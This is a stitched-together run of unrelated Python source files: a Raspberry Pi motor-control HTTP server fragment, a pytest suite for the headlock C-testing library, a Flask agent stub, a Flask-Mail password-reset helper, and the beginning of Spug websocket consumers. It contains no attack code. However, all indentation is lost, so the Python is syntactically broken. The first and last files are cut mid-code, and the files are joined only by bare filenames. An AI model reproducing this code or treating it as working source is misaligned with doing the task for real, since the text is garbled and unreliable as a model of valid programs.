post_data = post_data.split("=")[1] # Only keep the value
# You now have a dictionary of the post data
print("Command is {}".format(post_data))
# GPIO setup
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(18,GPIO.OUT)
if post_data == 'On':
GPIO.output(18, GPIO.HIGH)
elif post_data == 'Off':
GPIO.output(18, GPIO.LOW)
elif post_data == 'Hi-Speed':
myStepper1.setSpeed(15)
myStepper2.setSpeed(15)
elif post_data == 'Med-Speed':
myStepper1.setSpeed(10)
myStepper2.setSpeed(10)
elif post_data == 'Lo-Speed':
myStepper1.setSpeed(6)
myStepper2.setSpeed(6)
elif post_data == 'STOP':
stop_threads = False
turnOffMotors()
st1.join()
st2.join()
else: #post_data == 'Turn-Back':
stop_threads = False
turnOffMotors()
st1.join()
st2.join()
time.sleep(0.2)
myStepper1.setSpeed(6)
myStepper2.setSpeed(6)
if dir == Adafruit_MotorHAT.FORWARD:
dir = Adafruit_MotorHAT.BACKWARD
else:
dir = Adafruit_MotorHAT.FORWARD
stop_threads = True
#if not st1.isAlive():
st1 = threading.Thread(target=stepper_worker, args=(myStepper1, 20, dir, stepstyles[2],))
st1.start()
#if not st2.isAlive():
st2 = threading.Thread(target=stepper_worker, args=(myStepper2, 20, dir, stepstyles[2],))
st2.start()
self._redirect('/') # Redirect back to the root url
#self.wfile.write("You finished it".encode("utf-8"))
def getIP():
#myname = socket.getfqdn(socket.gethostname())
get_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
get_s.connect(('8.8.8.8', 0))
#ip = ('hostname: %s, localIP: %s') % (myname, get_s.getsockname()[0])
ip = ('%s') % (get_s.getsockname()[0])
return ip
def run():
if sys.argv[1:]:
host_port = int(sys.argv[1])
else:
host_port = 8000 # print('starting server, port', host_port)
host_name = getIP() # same the localhost ip host_name = '192.168.0.17'
# Server settings
server_address = (host_name, host_port)
httpd = HTTPServer(server_address, MytestHTTPServer)
#httpd = MyThreadingHTTPServer(('',8080), MytestHTTPServer)
#httpd = MyThreadingHTTPServer(server_address, MytestHTTPServer)
print('running server...', server_address)
#HandlerClass.protocol_version = Protocol # used SimpleHTTPRequestHandler
#httpd = ServerClass(server_address, HandlerClass) #used default server class
#sa = httpd.socket.getsockname()
#print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
run()
|
test_testsetup.py
|
import contextlib
import sys
from pathlib import Path
from unittest.mock import patch, Mock, call
import pytest
from threading import Thread
from time import sleep
from .helpers import build_tree
from headlock.testsetup import TestSetup, MethodNotMockedError, \
CProxyDescriptor, CProxyTypeDescriptor, BuildError, CompileError, CModule
from headlock.buildsys_drvs import default
from headlock.buildsys_drvs.gcc import GccBuildDescription, \
Gcc32BuildDescription
import headlock.c_data_model as cdm
@pytest.fixture
def TSDummy(tmpdir):
saved_sys_path = sys.path[:]
sys.path.append(str(tmpdir))
tmpdir.join('testsetup_dummy.py').write(
'class Container:\n'
' class TSDummy:\n'
' @classmethod\n'
' def __extend_by_transunit__(cls, transunit):\n'
' pass\n'
' @classmethod\n'
' def __extend_by_lib_search_params__(cls, req_libs,lib_dirs):\n'
' pass\n')
from testsetup_dummy import Container
sys.path = saved_sys_path
yield Container.TSDummy
del sys.modules['testsetup_dummy']
@contextlib.contextmanager
def sim_tsdummy_tree(base_dir, tree):
"""
    Simulate that TSDummy is located in 'base_dir' and that 'tree' is the file
structure below this directory.
"""
global __file__
base_path = build_tree(base_dir, tree)
saved_file = __file__
__file__ = str(base_dir.join('test_testsetup.py'))
try:
yield base_path
finally:
__file__ = saved_file
class TestBuildError:
def test_getStr_withMsgOnlyParam_returnsStrWithTestSetupClassName(self):
exc = BuildError('error abc')
assert str(exc) == 'error abc'
def test_getStr_withTestSetupPassed_returnsStrWithTestSetupClassName(self):
filepath = Path('c_files/empty.c')
exc = BuildError('cannot do xyz', filepath)
assert str(exc) == f'building {filepath} failed: cannot do xyz'
class TestCompileError:
def test_getStr_returnsNumberOfErrors(self):
exc = CompileError([('err 1', 'file1.c', 3),
('err 2', 'file2.h', 3)],
Path('test.c'))
assert str(exc) == 'building test.c failed: 2 compile errors'
def test_iter_iteratesErrors(self):
errlist = [('err 1', 'file1.c', 3), ('err 2', 'file2.h', 3)]
exc = CompileError(errlist)
assert list(exc) == errlist
class TestCProxyTypeDescriptor:
@pytest.fixture
def Dummy(self):
class Dummy:
attr = CProxyTypeDescriptor(cdm.BuildInDefs.int)
return Dummy
def test_get_onClass_returnsCProxyType(self, Dummy):
assert Dummy.attr is cdm.BuildInDefs.int
def test_get_onInstance_returnsCProxyWithAddrspace(self, Dummy):
dummy = Dummy()
dummy.__addrspace__ = Mock()
assert isinstance(dummy.attr, cdm.CIntType)
assert dummy.attr.__addrspace__ == dummy.__addrspace__
def test_set_onInstance_raisesAttributeError(self, Dummy):
with pytest.raises(AttributeError):
Dummy().attr = 99
class TestCProxyDescriptor:
@pytest.fixture
def Dummy(self):
class Dummy:
attr = CProxyDescriptor("attr", cdm.BuildInDefs.int)
return Dummy
def test_get_onClass_returnsCProxyType(self, Dummy):
assert Dummy.attr is cdm.BuildInDefs.int
def test_get_onInstance_returnsCProxyWithAddrspace(self, Dummy):
dummy = Dummy()
dummy.__addrspace__ = Mock()
assert isinstance(dummy.attr, cdm.CInt)
assert dummy.attr.ctype.__addrspace__ == dummy.__addrspace__
def test_set_onInstance_raisesAttributeError(self, Dummy):
with pytest.raises(AttributeError):
Dummy().attr = 99
class TestTestSetup(object):
"""
    This is an integration test that exercises the TestSetup class and the
collaboration of the headlock components
"""
def abs_dir(self):
return (Path(__file__).parent / 'c_files').resolve()
def extend_builddesc(self, builddesc:GccBuildDescription,
source_code, filename):
abs_filename = self.abs_dir() / filename
abs_filename.write_bytes(source_code)
builddesc.add_c_source(abs_filename)
def create_builddesc(self, source_code, filename, *, unique_name=True,
**macros):
builddesc = default.BUILDDESC_CLS(
Path(filename).name,
self.abs_dir() / (filename + '.build'),
unique_name)
builddesc.add_predef_macros(macros)
self.extend_builddesc(builddesc, source_code, filename)
return builddesc
def cls_from_ccode(self, src, filename,
src_2=None, filename_2=None, **macros):
builddesc = self.create_builddesc(src, filename, **macros)
if src_2 is not None:
self.extend_builddesc(builddesc, src_2, filename_2)
class TSDummy(TestSetup): pass
TSDummy.__set_builddesc__(builddesc)
return TSDummy
@pytest.fixture
def ts_dummy(self):
return self.cls_from_ccode(b'', 'test.c')
class TSBuildDescFactory(TestSetup): pass
def test_builddescFactory_returnsBuildDescWithGlobalBuildDirAndName(self):
builddesc = self.TSBuildDescFactory.__builddesc_factory__()
assert builddesc.name == 'TSBuildDescFactory.TestTestSetup'
assert builddesc.build_dir \
== Path(__file__).parent.resolve() / \
'.headlock/test_testsetup' / builddesc.name
def test_builddescFactory_onLocalTestSetupDefinition_returnsBuildDescWithHashInBuilDir(self):
class TSBuildDescFactory(TestSetup): pass
builddesc = TSBuildDescFactory.__builddesc_factory__()
int(builddesc.build_dir.name[-8:], 16) # expect hexnumber at the end
assert builddesc.build_dir.name[-9] == '_'
def test_builddescFactory_onDynamicGeneratedTSClsWithSameParams_returnsBuildDescWithSameBuildDir(self):
builddesc1 = self.create_builddesc(b'', 'test.c', unique_name=False,
MACRO=1)
builddesc2 = self.create_builddesc(b'', 'test.c', unique_name=False,
MACRO=1)
assert builddesc1.build_dir == builddesc2.build_dir
def test_builddescFactory_onDynamicGeneratedTSClsWithDifferentParams_returnsBuildDescWithDifferentBuildDir(self):
builddesc1 = self.create_builddesc(b'', 'test.c', unique_name=False,
A=1, B=222, C=3)
builddesc2 = self.create_builddesc(b'', 'test.c', unique_name=False,
A=1, B=2, C=3)
assert builddesc1.build_dir != builddesc2.build_dir
def test_macroWrapper_ok(self):
TS = self.cls_from_ccode(b'#define MACRONAME 123', 'macro.c')
assert TS.MACRONAME == 123
def test_macroWrapper_onNotConvertableMacros_raisesValueError(self):
cls = self.cls_from_ccode(b'#define MACRONAME (int[]) 3',
'invalid_macro.c')
ts = cls()
with pytest.raises(ValueError):
_ = ts.MACRONAME
def test_create_onPredefinedMacro_providesMacroAsMember(self):
TSMock = self.cls_from_ccode(b'', 'create_predef.c',
A=None, B=1, C='')
with TSMock() as ts:
assert ts.A is None
assert ts.B == 1
assert ts.C is None
def test_init_onValidSource_ok(self):
TS = self.cls_from_ccode(b'/* valid C source code */', 'comment_only.c')
ts = TS()
ts.__unload__()
@patch('headlock.testsetup.TestSetup.__unload__')
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__build__')
def test_init_callsBuild(self, __build__, __load__, __unload__):
TS = self.cls_from_ccode(b'', 'init_does_build.c')
ts = TS()
__build__.assert_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__')
def test_init_callsLoad(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'init_calls_load.c')
ts = TS()
__load__.assert_called_once()
@patch('headlock.testsetup.TestSetup.__startup__')
def test_init_doesNotCallStartup(self, __startup__):
TS = self.cls_from_ccode(b'', 'init_on_nostartup.c')
ts = TS()
__startup__.assert_not_called()
ts.__unload__()
def test_build_onMultipleFilesWithReferences_ok(self):
TSMock = self.cls_from_ccode(
b'void callee(void) { return; }', 'prev.c',
b'void callee(void); void caller(void) { callee(); }', 'refprev.c')
TSMock()
def test_build_onPredefinedMacros_passesMacrosToCompiler(self):
TSMock = self.cls_from_ccode(b'int a = A;\n'
b'int b = B 22;\n'
b'#if defined(C)\n'
b'int c = 33;\n'
b'#endif',
'build_predef.c',
A=11, B='', C=None)
with TSMock() as ts:
assert ts.a.val == 11
assert ts.b.val == 22
assert ts.c.val == 33
@patch('headlock.testsetup.TestSetup.__shutdown__')
def test_unload_onStarted_callsShutdown(self, __shutdown__):
TS = self.cls_from_ccode(b'int var;', 'unload_calls_shutdown.c')
ts = TS()
ts.__startup__()
ts.__unload__()
__shutdown__.assert_called_once()
@patch('headlock.testsetup.TestSetup.__shutdown__')
def test_unload_onNotStarted_doesNotCallsShutdown(self, __shutdown__):
TS = self.cls_from_ccode(b'int var;', 'unload_calls_shutdown.c')
ts = TS()
ts.__unload__()
__shutdown__.assert_not_called()
def test_unload_calledTwice_ignoresSecondCall(self):
TS = self.cls_from_ccode(b'', 'unload_run_twice.c')
ts = TS()
ts.__unload__()
ts.__shutdown__ = Mock()
ts.__unload__()
ts.__shutdown__.assert_not_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__')
def test_del_doesImplicitShutdown(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'unload_run_twice.c')
ts = TS()
__unload__.assert_not_called()
del ts
__unload__.assert_called()
@patch('headlock.testsetup.TestSetup.__load__')
@patch('headlock.testsetup.TestSetup.__unload__', side_effect=KeyError)
def test_del_onErrorDuringUnload_ignore(self, __unload__, __load__):
TS = self.cls_from_ccode(b'', 'unload_with_error_during_del.c')
ts = TS()
del ts
def test_enter_onNotStarted_callsStartup(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_on_enter.c')
ts = TSMock()
with patch.object(ts, '__startup__') as startup:
ts.__enter__()
startup.assert_called_once()
ts.__unload__()
def test_enter_onAlreadyStarted_doesNotCallStartup(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_enter_on_started.c')
ts = TSMock()
ts.__startup__()
with patch.object(ts, '__startup__') as startup:
ts.__enter__()
startup.assert_not_called()
ts.__unload__()
def test_exit_callsUnload(self):
TSMock = self.cls_from_ccode(b'', 'contextmgr_on_exit.c')
ts = TSMock()
ts.__enter__()
with patch.object(ts, '__unload__', wraps=ts.__unload__):
ts.__exit__(None, None, None)
ts.__unload__.assert_called_once()
def test_funcWrapper_onNotInstantiatedTestSetup_returnsCProxyType(self):
TSMock = self.cls_from_ccode(b'int func(int a, int b) { return a+b; }',
'func_not_inst.c')
assert isinstance(TSMock.func, cdm.CFuncType)
assert isinstance(TSMock.func.returns, cdm.CIntType)
def test_funcWrapper_ok(self):
TSMock = self.cls_from_ccode(
b'short func(char a, int *b) { return a + *b; }', 'func.c')
with TSMock() as ts:
assert ts.func(11, ts.int(22).adr) == 33
def test_funcWrapper_onMultipleUniqueSignatures_ok(self):
TSMock = self.cls_from_ccode(
b'int func1(int a) { return 11; }'
b'int func2(int a, int b) { return 22; }'
b'int func3(int a, int b, int c) { return 33; }'
b'int func4(int a, int b, int c, int d) { return 44; }',
'func_multi_unique_sig.c')
with TSMock() as ts:
assert ts.func1(0) == 11
assert ts.func2(0, 0) == 22
assert ts.func3(0, 0, 0) == 33
assert ts.func4(0, 0, 0, 0) == 44
def test_funcWrapper_onMultipleIdenticalSignatures_ok(self):
TSMock = self.cls_from_ccode(
b'int func1(int a) { return 11; }'
b'int func2(int a) { return 22; }',
'func_multi_identical_sig.c')
with TSMock() as ts:
assert ts.func1(0) == 11
assert ts.func2(0) == 22
def test_funcWrapper_onStructAsParamAndReturnsValue_ok(self):
TSMock = self.cls_from_ccode(
b'struct param { int m1, m2; };\n'
b'struct result { int m1, m2; };\n'
b'struct result func(struct param p) {\n'
b' struct result r = {p.m1+1, p.m2+1};\n'
b' return r;\n'
b'}',
'func_with_struct.c')
with TSMock() as ts:
param = ts.struct.param(100, 200)
assert ts.func(param) == dict(m1=101, m2=201)
def test_funcPtrWrapper_ok(self):
TSMock = self.cls_from_ccode(b'typedef int (* func_ptr_t)(int);\n'
b'func_ptr_t func_ptr;\n'
b'int call_func_ptr(int param) {\n'
b' return (*func_ptr)(param);\n'
b'}',
'funcptr.c')
with TSMock() as ts:
pyfunc = Mock(return_value=111)
ts.func_ptr.val = ts.func_ptr_t(pyfunc)
ts.call_func_ptr(2222)
pyfunc.assert_called_once_with(2222)
def test_funcPtrWrapper_requiringStruct_ok(self):
TSMock = self.cls_from_ccode(b'typedef struct { int m1, m2; } strct;\n'
b'typedef int (* func_ptr_t)(strct);\n'
b'func_ptr_t func_ptr;',
'funcptr_with_struct.c')
with TSMock() as ts:
def pyfunc(strct):
assert strct.m1 == 1111
assert strct.m2 == 2222
ts.func_ptr.val = ts.func_ptr_t(pyfunc)
ts.func_ptr(ts.strct(1111, 2222))
def test_varWrapper_onNotInstantiatedTestSetup_returnsCProxyType(self):
TSMock = self.cls_from_ccode(b'short var = 1;',
'var_not_inst.c')
assert isinstance(TSMock.var, cdm.CIntType)
assert TSMock.var.sizeof == 2
def test_varWrapper_ok(self):
TSMock = self.cls_from_ccode(b'int var = 11;', 'var.c')
with TSMock() as ts:
assert ts.var.val == 11
ts.var.val = 22
assert ts.var.val == 22
def test_mockVarWrapper_ok(self):
TSMock = self.cls_from_ccode(b'extern int var;', 'mocked_var.c')
with TSMock() as ts:
assert ts.var.val == 0
ts.var.val = 11
assert ts.var.val == 11
def test_mockFuncWrapper_createsCWrapperCode(self):
TSMock = self.cls_from_ccode(
b'int mocked_func(int p);'
b'int func(int p) { return mocked_func(p) + 33; }',
'mocked_func_cwrapper.c')
with TSMock() as ts:
ts.mocked_func_mock = Mock(return_value=22)
assert ts.func(11) == 22 + 33
ts.mocked_func_mock.assert_called_once_with(11)
def test_mockFuncWrapper_onOverwriteStack_keepsCProxyVal(self):
TSMock = self.cls_from_ccode(
b'void f(int val);\n'
b'void call_3_times(void) { f(1111); f(2222); f(3333); return; }',
'multicalled_mock.c')
with TSMock() as ts:
call_params = []
ts.f_mock = lambda param: call_params.append(param)
ts.call_3_times()
assert call_params == [1111, 2222, 3333]
def test_headerFileOnly_createsMockOnly(self):
TSMock = self.cls_from_ccode(b'int func();', 'header.h')
with TSMock() as ts:
ts.func_mock = Mock(return_value=123)
assert ts.func().val == 123
def test_mockFuncWrapper_onNotExistingMockFunc_forwardsToMockFallbackFunc(self):
TSMock = self.cls_from_ccode(b'int func(int * a, int * b);',
'mocked_func_fallback.c')
with TSMock() as ts:
ts.mock_fallback = Mock(return_value=33)
assert ts.func(11, 22) == 33
ts.mock_fallback.assert_called_with('func', ts.int.ptr(11),
ts.int.ptr(22))
def test_mockFuncWrapper_onUnmockedFunc_raisesMethodNotMockedError(self):
TSMock = self.cls_from_ccode(b'void unmocked_func();',
'mocked_func_error.c')
with TSMock() as ts:
with pytest.raises(MethodNotMockedError) as excinfo:
assert ts.mock_fallback('unmocked_func', 11, 22)
assert "unmocked_func" in str(excinfo.value)
def test_mockFuncWrapper_onRaisesException_forwardsExcImmediatelyToCallingPyCode(self):
TSMock = self.cls_from_ccode(b'void exc_func();\n'
b'void func() { exc_func(); exc_func(); }',
'exc_forwarder.c')
with TSMock() as ts:
ts.exc_func_mock = Mock(side_effect=ValueError)
with pytest.raises(ValueError):
ts.func()
assert ts.exc_func_mock.call_count == 1
def test_mockFuncWrapper_onRaisesException_forwardsExcOverMultipleBridges(self):
TSMock = self.cls_from_ccode(b'void inner_py();\n'
b'void outer_py();\n'
b'void inner_c() { while(1) inner_py();}\n'
b'void outer_c() { while(1) outer_py();}',
'multibridged_exc_forwarder.c')
with TSMock() as ts:
ts.outer_py_mock = lambda: ts.inner_c()
ts.inner_py_mock = Mock(side_effect=KeyError)
with pytest.raises(KeyError):
ts.outer_c()
def test_mockFuncWrapper_onRaisesExceptionsInMultipleThreads_handlesEveryThreadSeparately(self):
TSMock = self.cls_from_ccode(b'void exc_func(int tid);\n'
b'void func(int tid) {exc_func(tid);}',
'multithreaded_exc_forwarder.c')
with TSMock() as ts:
def exc_func(tid):
sleep(0.030)
raise ValueError(str(tid))
ts.exc_func_mock = exc_func
def thread_func(tid):
with pytest.raises(ValueError, match=str(tid)):
ts.func(tid)
threads = [Thread(target=thread_func, args=[tid])
for tid in range(5)]
for thread in threads:
thread.start()
sleep(0.005)
for thread in threads:
thread.join()
def test_typedefWrapper_storesTypeDefInTypedefCls(self):
TSMock = self.cls_from_ccode(b'typedef int td_t;', 'typedef.c')
with TSMock() as ts:
assert ts.td_t == ts.int
def test_typedefWrapper_instanciate_ok(self):
TSMock = self.cls_from_ccode(b'typedef int i;', 'instantiate_typedef.c')
with TSMock() as ts:
assert ts.i(33) == 33
def test_structWrapper_storesStructDefInStructCls(self):
TSMock = self.cls_from_ccode(b'struct strct_t { };', 'struct.c')
with TSMock() as ts:
assert isinstance(ts.struct.strct_t, cdm.CStructType)
def test_structWrapper_onContainedStruct_ensuresContainedStructDeclaredFirst(self):
TSMock = self.cls_from_ccode(
b'struct s2_t { '
b' struct s1_t { int m; } s1; '
b' struct s3_t { int m; } s3;'
b'} ;'
b'void f(struct s2_t);',
'inorder_defined_structs.c')
with TSMock(): pass
def test_structWrapper_onContainedStructPtr_ensuresNonPtrMembersDeclaredFirst(self):
TSMock = self.cls_from_ccode(
b'struct outer_t;'
b'struct inner_t { '
b' struct outer_t * outer_ptr;'
b'} inner_t; '
b'struct outer_t { '
b' struct inner_t inner;'
b'} outer;'
b'void f(struct inner_t);',
'inorder_ptr_structs.c')
with TSMock(): pass
def test_structWrapper_onGlobalVarFromStruct_ok(self):
TSMock = self.cls_from_ccode(b'struct strct { int a; };\n'
b'struct strct var;',
'global_var_from_structs.c')
with TSMock() as ts:
assert ts.var.ctype == ts.struct.strct
def test_structWrapper_onVarFromAnonymousStruct_ok(self):
TSMock = self.cls_from_ccode(b'struct { int a; } var;',
'anonymous_structs_var.c')
with TSMock() as ts:
assert isinstance(ts.var.ctype, cdm.CStructType)
def test_structWrapper_onTypedefFromAnonymousStruct_renamesStructToMakeItUsableAsParameter(self):
TSMock = self.cls_from_ccode(b'typedef struct { int a; } t;\n'
b'void func(t * a);',
'anonymous_structs_typedef.c')
with TSMock() as ts:
anon_cstruct_type = getattr(ts.struct, '__anonymousfromtypedef__t')
assert not anon_cstruct_type.is_anonymous_struct()
def test_structWrapper_onInstanciate_bindsAddrSpace(self):
TSMock = self.cls_from_ccode(b'struct s_t { int a; };',
'instanciated_struct.c')
with TSMock() as ts:
assert ts.struct.s_t(44) == dict(a=44)
def test_structWrapper_onInstanciateWithPointerMember_instantiatesMemberToo(self):
TSMock = self.cls_from_ccode(b'struct s_t { char * ptr; };',
'instanciated_struct_with_ptr.c')
with TSMock() as ts:
s = ts.struct.s_t(b'TEST')
assert s.ptr.ref.mem == b'TEST'
def test_enumWrapper_storesEnumDefInEnumCls(self):
TSMock = self.cls_from_ccode(b'enum enum_t { a };', 'enum.c')
with TSMock() as ts:
assert isinstance(ts.enum.enum_t, cdm.CEnumType)
def test_onSameStructWithAnonymousChildInDifferentModules_generateCorrectMockWrapper(self):
TSDummy = self.cls_from_ccode(
b'struct s { struct { int mm; } m; };\n'
b'int func1(struct s p);\n', 'anonymstruct_mod1.c',
b'struct s { struct { int mm; } m; };\n'
b'int func2(struct s p);\n', 'anonymstruct_mod2.c')
with TSDummy() as ts:
pass
def test_onPointerToArrayOfStruct_generatesCorrectMockWrapper(self):
TSDummy = self.cls_from_ccode(b'typedef struct strct {} (*type)[1];\n'
b'void func(type param);',
'ptr_to_arr_of_strct.c')
with TSDummy() as ts:
pass
def test_onConstStruct_ok(self):
TSDummy = self.cls_from_ccode(b'const struct s {} x;',
'const_strct.c')
with TSDummy() as ts:
pass
def test_onTwoTestsetups_haveDifferentStructCollections(self):
TS1 = self.cls_from_ccode(b'struct s { int a; };', 'struct1.c')
TS2 = self.cls_from_ccode(b'struct s { int b; };', 'struct2.c')
assert hasattr(TS1.struct.s, 'a')
assert hasattr(TS2.struct.s, 'b')
def test_registerUnloadEvent_onRegisteredEvent_isCalledOnUnload(self):
TSDummy = self.cls_from_ccode(b'', 'test_register_unload_ev.c')
ts = TSDummy()
on_unload = Mock()
ts.register_unload_event(on_unload)
ts.__shutdown__()
on_unload.assert_not_called()
ts.__unload__()
on_unload.assert_called_once()
def test_registerUnloadEvent_onParams_arePassedWhenUnloaded(self):
TSDummy = self.cls_from_ccode(b'', 'test2.c')
with TSDummy() as ts:
on_unload = Mock()
ts.register_unload_event(on_unload, "PARAM1", 2)
on_unload.assert_called_with('PARAM1', 2)
def test_registerUnloadEvent_onMultipleEvents_areCalledInReversedOrder(self):
TSDummy = self.cls_from_ccode(b'', 'test3.c')
with TSDummy() as ts:
on_unload = Mock()
ts.register_unload_event(on_unload, 1)
ts.register_unload_event(on_unload, 2)
ts.register_unload_event(on_unload, 3)
assert on_unload.call_args_list == [call(3), call(2), call(1)]
@pytest.mark.skipif(sys.platform != 'win32',
                        reason='Currently there is no Linux '
'equivalent to __cdecl')
def test_attributeAnnotationSupport_onStdIntIncluded_ok(self):
TSDummy = self.cls_from_ccode(b'#include <stdint.h>\n'
b'int __cdecl cdecl_func(void);',
'attr_annotation_support.c')
with TSDummy() as ts:
assert '__cdecl' in ts.cdecl_func.ctype.__c_attribs__
class TestCModule:
class TestSetupMock:
__builddesc__ = None
@classmethod
def __builddesc_factory__(cls):
return Gcc32BuildDescription('', Path(''))
@classmethod
def __set_builddesc__(cls, builddesc):
cls.__builddesc__ = builddesc
@patch.object(Path, 'is_file', return_value=True)
def test_call_onSrcPath_derivesBuilddescFactoryToAddAbsSrcPath(self, is_file):
@CModule('rel_src.c')
class TSRelSrc(self.TestSetupMock): pass
abs_c_src = Path(__file__).resolve().parent / 'rel_src.c'
assert TSRelSrc.__builddesc__.c_sources() == [abs_c_src]
is_file.assert_called_with(abs_c_src)
@patch.object(Path, 'is_file', return_value=False)
def test_call_onInvalidSrcPath_raisesOSError(self, is_file):
with pytest.raises(OSError):
@CModule('rel_src.c')
class TSInvalidSrc(self.TestSetupMock): pass
@patch.object(Path, 'is_file', return_value=True)
    def test_call_onPredefMacros_derivesBuilddescFactoryToAddPredefMacros(self, is_file):
@CModule('src.c', MACRO1=1, MACRO2='')
class TSPredefMacros(self.TestSetupMock): pass
abs_c_src = Path(__file__).resolve().parent / 'src.c'
assert TSPredefMacros.__builddesc__.predef_macros() \
== {abs_c_src: dict(MACRO1='1', MACRO2='')}
@patch.object(Path, 'is_file', return_value=True)
@patch.object(Path, 'is_dir', return_value=True)
def test_call_onInclOrLibDir_derivesBuilddescFactoryToSetAbsDirPath(self, is_dir, is_file):
@CModule('src.c', include_dirs=['rel/dir'])
class TSRelDir(self.TestSetupMock): pass
abs_src = Path(__file__).resolve().parent / 'src.c'
abs_path = Path(__file__).resolve().parent / 'rel/dir'
assert TSRelDir.__builddesc__.incl_dirs() == {abs_src: [abs_path]}
is_dir.assert_called_with(abs_path)
@patch.object(Path, 'is_file', return_value=True)
@patch.object(Path, 'is_dir', return_value=False)
@pytest.mark.parametrize('dir_name', ['library_dirs', 'include_dirs'])
def test_call_onInvalidInclOrLibDir_raisesOSError(self, is_dir, is_file, dir_name):
with pytest.raises(OSError):
@CModule('src.c', **{dir_name: 'invalid/dir'})
class TSInvalidDir(self.TestSetupMock): pass
@patch.object(Path, 'is_file', return_value=True)
def test_call_onDerivedClass_doesNotModifyBaseClassesBuildDesc(self, is_file):
@CModule('src_base.c')
class TSBase(self.TestSetupMock): pass
@CModule('src_derived.c')
class TSDerived(TSBase): pass
assert {p.name for p in TSBase.__builddesc__.c_sources()} \
== {'src_base.c'}
assert {p.name for p in TSDerived.__builddesc__.c_sources()} \
== {'src_base.c', 'src_derived.c'}
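# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the test suite above): outside of tests,
# the CModule decorator is typically applied to a TestSetup subclass roughly
# like this. The file name, macro and C function names are placeholders
# inferred from the tests, not an authoritative example from the headlock docs.
#
# from headlock.testsetup import TestSetup, CModule
#
# @CModule('my_module.c', MY_MACRO=1)
# class TSMyModule(TestSetup):
#     pass
#
# with TSMyModule() as ts:
#     assert ts.my_c_func(1, 2) == 3      # hypothetical C function under test
#     ts.callback_mock = lambda arg: 0    # hypothetical mocked C dependency
# ---------------------------------------------------------------------------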
|
tr_ara_simple.py
|
from flask import Flask, request, url_for, jsonify, abort
import requests, sys, threading, time
ARS_API = 'http://localhost:8000/ars/api'
def setup_app():
DEFAULT_ACTOR = {
'channel': 'general',
'agent': {
'name': 'ara-simple-agent',
'uri': 'http://localhost:5000'
},
'path': '/simple' # relative to agent's uri
}
    # wait for flask to finish initializing before it can accept
# connections from the ars
time.sleep(2)
r = requests.post(ARS_API+'/actors', json=DEFAULT_ACTOR)
if r.status_code != 201 and r.status_code != 302:
        app.logger.error('Unable to initialize actor; %s returned status %d'
% (r.url, r.status_code))
sys.exit(1)
print('initializing %s...%d\n%s' % (__name__, r.status_code, r.text))
app = Flask(__name__)
threading.Thread(target=setup_app).start()
@app.route('/', methods=['GET'])
def index():
return 'A simple ARA that does nothing!'
@app.route('/simple', methods=['POST'])
def simple():
data = request.get_json()
if 'model' not in data or data['model'] != 'tr_ars.message':
return abort(400)
app.logger.debug('%s: received message...%s' % (request.url, data['pk']))
mesg = data['fields']
    if 'ref' not in mesg or mesg['ref'] is not None:
# this is not a head message, so we're not interested
return abort(400)
return (jsonify(message="This is an acknowledgement that I have nothing to contribute to this query!"),
200, # return status code
{'tr_ars.message.status': 'D'}) # set the status of the message
if __name__ == '__main__':
app.run()
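# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original script): a minimal way to exercise
# the /simple endpoint by hand, assuming the agent is running on port 5000.
# The payload shape mirrors what simple() checks for ('model' and 'fields');
# the pk and field values are placeholders.
#
# import requests
#
# r = requests.post('http://localhost:5000/simple', json={
#     'model': 'tr_ars.message',
#     'pk': '00000000-0000-0000-0000-000000000000',
#     'fields': {'ref': None},   # ref == None marks a head message
# })
# print(r.status_code, r.text)
# ---------------------------------------------------------------------------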
|
email.py
|
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
# Synchronous variant kept for reference; commented out so it does not shadow
# the threaded send_email() defined above.
# def send_email(subject, sender, recipients, text_body, html_body):
#     msg = Message(subject, sender=sender, recipients=recipients)
#     msg.body = text_body
#     msg.html = html_body
#     mail.send(msg)
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
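# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): send_email() and
# send_password_reset_email() are normally invoked from request handlers.
# The route, form and User model below are placeholders from a typical Flask
# application, not code defined in this module.
#
# @app.route('/reset_password_request', methods=['GET', 'POST'])
# def reset_password_request():
#     form = ResetPasswordRequestForm()
#     if form.validate_on_submit():
#         user = User.query.filter_by(email=form.email.data).first()
#         if user:
#             send_password_reset_email(user)
#     ...
# ---------------------------------------------------------------------------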
|
consumers.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the AGPL-3.0 License.
from channels.generic.websocket import WebsocketConsumer
from django_redis import get_redis_connection
from apps.host.models import Host
from threading import Thread
import json
class ExecConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token = self.scope['url_route']['kwargs']['token']
self.rds = get_redis_connection()
def connect(self):
self.accept()
def disconnect(self, code):
self.rds.close()
def get_response(self):
response = self.rds.brpop(self.token, timeout=5)
return response[1] if response else None
def receive(self, **kwargs):
response = self.get_response()
while response:
data = response.decode()
self.send(text_data=data)
response = self.get_response()
self.send(text_data='pong')
class SSHConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = self.scope['user']
self.id = self.scope['url_route']['kwargs']['id']
self.chan = None
self.ssh = None
def loop_read(self):
while True:
data = self.chan.recv(32 * 1024)
